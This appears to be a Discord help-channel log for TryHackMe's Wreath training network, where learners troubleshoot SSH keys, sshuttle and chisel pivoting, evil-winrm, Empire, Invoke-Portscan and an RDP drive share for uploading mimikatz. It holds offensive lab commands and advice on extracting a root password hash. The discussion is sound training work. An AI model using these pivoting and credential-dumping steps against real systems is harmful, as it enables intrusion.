I think I tried doing that too but I’m unsure. I can try again later and let you know. Thanks again

Gave +1 Rep to @hollow bane

no problem

I probably wont be able to work on wreath until the end of the week so I will let you know friday if I am still having the same issue

Oki doke

Did the default creds for starkiller change?

update: had to change them using the password and username args

it's 404'ing the login request from starkiller now, tho

I guess it's time to master the CLI then..

if you don't finish the room in the allotted time do your points/the entire room reset or can you pick back up from where you were?

update: I'm stupid

turns out the github isn't modernized

and it's 2 major releases behind

aka 6 years

you can pickup whenever you want to, youll just need to rejoin the room

but the whole subnet and the range of IP's you'll be attacking will also change

so keep this if you want to attack all the machines all over again.

True

But if you have good notes it's just a matter of swapping IP's out

Hey guys, I need a sanity check. I've done a couple of full TCP scans on the first box, but apart from the first attempt, NMAP cannot find the HTTP service that I found on both the NMAP and by using the browser. Have I done something wrong?

What nmap switches did you use?

Also use rustscan, it’s waaayyy faster

why the first machine is not acceptin ssh connection? it is returning 'its garbled time'

hmm

mind sharing a screenshot?

Can't help without screenshots

Still getting the same issue with uploading chisel. "Error: Upload failed. Check filenames or paths"\

I'm not getting the option of sending images on this channel

I tried the command 'ssh root@10.200.198.200 -i id_rsa'. The output is 'Garbled time'

!docs verify

Iirc you don't ssh as root for any part of wreath

I have the ssh key of root, how do i gain a ssh shell?

Have you tried adding -v for verbose output? This may help identify the issue.

still not able to identify the issue

hmm not sure. You could try a more verbose output -vvv in case that reveals any more.

i think wreath needs a reset 😦

can someone please vote 🙏

10.200.188.200

the network is down

anyone on 10.200.104.200?

think I need a reset

no matter, was my VPN config, seemed to be confused, switched back to VIP and re-downloaded Wreath profile, all working now.

Help

Please provide more information on what you need help with. Generally speeds things up. 🙂

Are you being robbed? Did your dog poop on your couch?

What exactly do you need help with

?

I am making a bot

You my friend are in the wrong channel then

please

Or @

#programming is prolly your best bet

Ok thanks

Hello all, somebody have trouble to ssh on 10.200.188.200 ? the port 22 seems to be filtered 😦

!docs verify

Follow the above link and follow the steps listed there. Then post a screenshot of what you're seeimg

done for the verify step 🙂

and this is the screen about ssh trouble :/

Interesting. Try reseting the network

hmmmm

this room is so amazing

really helped iron out many details

Question with uploading Invoke-portscan

i see the ruby error, but apt install ruby-full did not help

can you load the file/script first?

not super familiar with Evil-winrm

You have ti import the module first

Import-Module .\Invoke-Portscan.ps1

i think its this aswell

but ima try

Then you'll be able to use

Invoke-Portscan

To invoke the script

This isn't your issue lol

pretty sure yeah it is brother

Remote path completion
This feature could be not available depending of the ruby you are using. It must be compiled with readline support. Otherwise, this feature will not work (a warning will be shown).

Method 1 (compile the needed extension)
Using this method you'll compile ruby with the needed readline feature but to use only the library without changing the default ruby version on your system. Because of this, is the most recommended method.

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
my error:

powershell is def not case sensitive

Also, did you just not used the invoke ports and script?

but there ya go

why wont you read my error?

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Isn't there -s flag for evil-winrm to provide a directory containing .ps1 files🤔

remoter path completion is from my box

yeah

im doing that

Yea. Thats cuz you're trying to execute invoke portscan on a system that it dosent exist on

its a ruby error

thanks anyway ima try to compile it with /ext/readline like its saying

....

thanks anyway broooo

Send a screenshot of your evil-winrm command

Your issue isn't remote path completion lol

lol that is exactly my issue by definition

Did you transfer the file?😅

No it's not lol. You want to use a powershell file. You have 2 ways to use it. 1, transfer it manually, or 2, use the -s flag with evil-winrm so it's accessible

The error your getting is because you're trying to run a script that dosent exist

why wont you leave me alone?

You asked for help?

Read your error message. FileNotFoundError

i get what you are saying bro, but you are sayiung power shell is case sensitive. i dont want yo help

so please, leave me alone

That's not what I said lol

Bit ok

fair enough, other dude said tha

I told you what your problem is. If you don't wanna listen then by all means do what you want

👀

HII

having problems with task 35, cannot download the Website, it's showing as download successful ... but then nothing in my local directory. Any ideas?

entering the full path of the file looks to have fixed the problem 🙂

Finished wreath with out issues, thanks so much again. Really learned a lot, and got the chance to work though trouble shooting. The Empire section was great I learned more than the pwk-200 pdf section on it. All of your rooms are great for that mater. Thank you. cheers. XD

Gave +1 Rep to @merry robin

ay

Hello! I have lost the connection with the machine by SSH, the environment says that it is running, but I try to connect and it does not leave me as I normally do. I am in parallel with a partner and it does not work like me

Ping the ip to check if it’s active

when running the http server and using http_hop listener

when i plug in the super long powershell script used when executing the multi hadnler

nothing happens

Yes

Empire bad

Try using other C2 frameworks

hey

could someone help me on the last task of wreaht

i cant seem to transfer the .exe file

hey guys, I'm just curious about the last question on task#6

"then use the command 'chmod 600 KEY_name' to obtain persistent access to the box"

why not doing straight "ssh -i {name_of_key} root@{IP}"

why the need of 'chmod 600 {key_name}' ?

oh I guess in case we don't have the right perm on the file ... okay nvm

Yea. ssh private keys need ti only be accessible by the owner of the key. If there are any added permissions the key won't work

I am stuck on Task 34, Wappalyzer is reporting a certain version number which isn't correct according to the question, has it been changed or something?

Boxes haven't been updated

One sec

What answer are you getting?

@merry robin || PHP 5.4.3 ||

Oh wait, It may me being a derp

Okay, Now i am more confused, Task 34, i am supposed to chisel the gitserver or personal machine?

You should be using chisel on the gitserver to access the personal PC

Wappalyzer should be used on the personal PC

When i say Personal PC, i mean the last machine in the chain.

So right now i have Chisel server on GitServer and Chisel Client on my Attacking Machine and Wappa is giving that result i said.

Can you screenshot your web browser with Wappalyzer open? @topaz mortar

As in, show me the web page you're looking at

@merry robin

That ain't the personal PC -- that's the gitserver you're looking at

Okay, as i guessed. Will re-read the stuff, must missed something

You've definitely got mixed up somewhere with the forwarding 😄

Yeah

What are my limitations on this network if I've 7 day streak badge(not the streak at the moment) and no subscription.

You need an active 7-day streak to join, but after that, none :)

Great room!!! For the cleaning of your tracks at the end. Do it in the right order otherwise it's a challenge & problem.👍

I think someone messed up the rsa key on 10.200.187.200. They also put their tuno there lol

Yeah it's broken

So reset the network

takes 8 people

Ik. It'll take you bit. You can vote once every hour tho, so not forever

Why is this root hash in a different format than what THM is asking for lol

@merry robin help plx

Hello guys
I'm stuck in the Wreath task 20 since 2hours now

=> I've downloaded the exploit correctly and when i execute, i have an error (No modules named requests)

=> I've tried python2 and requests reinstallation but they say request requirements are already satisfied.

Don't know how to solve it , can someone help or guide me?!

try pip3 install requests

That ain't gonna help with a Python 2 exploit

Either figure out your environment, or use the Python 3 version I posted in here (check the pins)

Thanks 🙏🏾

Gave +1 Rep to @merry robin

Oh right. I forgot it was a python 2 exploit. My bad.

Np :)

Been a while since I did this network. I need to redo it and take better notes

try to remove the requests mdoule and reinstall with python2 -m pip install requests

Or better yet, figure out virtual environments rather than fucking up your device env

Hi, The password hash for root is different to what THM is asking for

Hey I have a question, I added the ip like it is described to my /etc/hosts but if I want to access the web page I get an timeout every time
has anyone had that problem before?

@stoic flicker

Hi

hello

can i help you

https://ibb.co/nbdRP5d

https://ibb.co/fCLtM1w

Port 22 on the target machine will only be accessible if you pivot successfully.

Also I don't think anyone will open the link.

I follow the official documentation, but I can’t connect

ssh: connect to host 10.200.193.200 port 22: Connection refused 127 ⨯ 1 ⚙
c : fatal: c : failed to establish ssh session (2)

[1] + exit 99 sshuttle -r root@10.200.193.200 --ssh-cmd "ssh -i id_rsa" 10.200.193.0/24 -x

I think you need to add the address of your initial target after -x so it is excluded.

At work atm, will look into the room in a bit.

hello

hello

Is anyone online?

@buoyant island

hello

Someone has the Invoke-PortScan script?

no

@gritty cosmosI have the same problem as you. Has your problem been solved?

i have a technical issue with this network, after i ssh into the first box 10.200.186.200 it is not responsive, i only get to interact with it for a few seconds before it stops responding, stops responding to ping as well, i'm not sure if it's with the other machines yet. \i'm using the in-browser attackbox. i dont think it's my 30Mbps internet connection.

how do i improve this?

hey what prob was that sorry

I completed the Network, holla if ya need a hand.

I'm about to start it. Holy crap that's alot of tasks lol

but you do have 10 days to complete it

Have fun 😄

🤦‍♂️

lol

Oh it says after 10 days you can re-join with saved progress 🙂

yeah

Yeah -- there isn't a time limit 🙂

You get removed after 10 days to ensure that you're not taking up one of the limited spaces on the network if you're not actually using it / have completed it, but there's nothing stopping you from just rejoining if you still need access (even without a streak) 🙂

I kinda wanna take a break but I don't wanna have to redo like 3 tasks to get where i was 🤣 I just got to the point where you use the rsa token to get a shell. If I log off and the machine goes inactive will I need to get a new rsa doc or will the same one still work?

when you do get removed though, the subnet you are working on will be changed

so if you did make good notes, you can work it all back up pretty easily

The same key works in all instances, and you won't lose any progress in the room :)

Sweet thanks @merry robin I can see where some things will have to go back and redo a few steps but if certain aspects stay the same then that's awesome. I'm gonna try to bust this out in 2-3 days though lol

Gave +1 Rep to @merry robin

I'm terrible with notes but I am taking them 🤣

So much reading and googling xD

Welp I screwed something up lol
I accidentally deleted the key that got way back in like task 6.. Now I'm trying to get back in with webmin and I'm getting failed to connect errors

Anyone have the rsa file handy they wouldn't mind sharing for the root ssh of network machine? xD
I can prove I've already moved past this point being on task 18 and we got the rsa in Task 6

boom got it with a bit of webmin magic.. was able to pull the rsa key. Now just have to copy/paste and hope it works

yes! Phew... talk about an hour setback xD
Just need to be a bit more care using the rm -r commands 🤣

@surreal sail thank you for this!!! "You are only supposed to copy & paste the hash only, not all other stuff in these other colons (so not the whole line, not the root: and all stuff after the hash :18890:0:99999:7:::" 😅

Gave +1 Rep to @hushed lark

Hi ! I'm having issues with the xrdp part of the wreath room. I'm trying to import mimikatz.exe on the machine but can't make it work. When following the expected solution, I run this command : "xfreerdp /v:10.200.90.150 /u:gavroche /p:mypassword +clipboard /dynamic-resolution /drive:/usr/share/windows,gavroche" but no "gavroche" drive appears... Any idea ? thanks !

That's where I got stuck and eventually gave up 2ish days ago...might come back to it later but it would just not create a shared drive. No idea what was doing wrong

Okay thanks, how would you upload mimikatz then ?

That's my point lol I couldn't get it. I'm debating just waiting for enough votes for a reset and starting from scratch with better note taking

K thanks. If anyone can think of anything... Would be appreciated 😉

if ssh was an option scp could be used but doubt it is even an option in this case

After being stumped for an hour or 2 I even went and watched darks walk through of that one (and a couple before it) with no luck 🤣 I claim it's just broked

Indeed 😢

I found a Fix !!

Just put everything you need on your home folder and use the following command :

xfreerdp /v:10.200.90.150 /u:gavroche /p:mypassword +home-drive

Enjoy 😉

going back to the network after a while, cant start is.. why? dont have any buttons (start\reset etc)

You may have to rejoin the room

I have a question, I am trying to work through the wreath network and I am stuck on task 6; someone has removed the id_rsa.pub file can we just regenerate a key pair or does it have to be the original one?

You can prolly regenerate with ssh-keygen as the file would be the same for all users anyway(until it is restarted)

Don't do that.

That would ruin the machine

Reset the network.

That is what I thought. I will just have to wait for the others to request a reset.

Does anyone know what the number is for network resets? I have been waiting since last night for a Wreath reset, and the number needed was 16, now we are needing 20 reset requests, it almost seams like every time someone requests a reset the number needed to reset the network goes up.

That is suspiciously high. Can you tell me the IP address of the first machine?

IP Address 10.200.72.200

Oh FFS

@limber rover any chance you could remove the people from my dev network again? 😆

I take it this was not a production net. LOL glad I said something.

Yeah. Basically what's happened is the number of users in the room has exceeded the number of networks available, so every new user is now getting dumped into the first instance of the network

Which is why there are about 100 people in my dev network rn

😆 got it.

There are a lot of people in the room, just looked at the count, 6075. That is impressive for how old the room is.

Smh. Still running up against the VPC limits too?

Looks like it

RIP

how?

Go to settings icon and select leave and then joinWreath room again.

Any update on if we can get moved out of your dev network? I have tried leaving and then rejoining the room but I still get dropped back into the same 10.200.72.0 network.

New to pivoting, was attempting to pivot to the second host via sshuttle. When I try to use the private key obtained previously, I get the following: Permission denied (publickey,gssapi-keyex,gssapi-with-mic). Would be grateful for any pointers. Thanks in advance.

You don't appear to be specifying the key

@merry robin apologies I just realized because of your comment that I added the wrong screenshot. The following is the correct one:

There's a formatting error there

Try using it to login over SSH?

I tried similar issue

@merry robin creating the id_rsa file using nano, pasting the contents of the private key into nano, and making sure that there are no leading and/or trailing spaces solved the issue. Previously I was creating a blank document from the GUI via right click. Thanks for taking an interest.

Gave +1 Rep to @merry robin

Ok i have a question?
i'm trying to log in via ssh
ssh -i id_rsa root@10.200.94.200
And 10.200.94.200 is asking for a password??

i did exactly the same

@candid cipher unless a change in the sshd config file, on the compromised host was made, possibly even by someone else other than yourself, I do not think that you should experience this situation,...how far off is your network from a reset?

Loving this room so far, just managed to exploit the gitserver and now moving onto the final stage.

it's def a great netowrk

I would really like to work on this network, but I and a few others are still stuck in a development network. I have tried leaving and rejoining the room but I keep getting dropped into the dev network. Can I please get some help?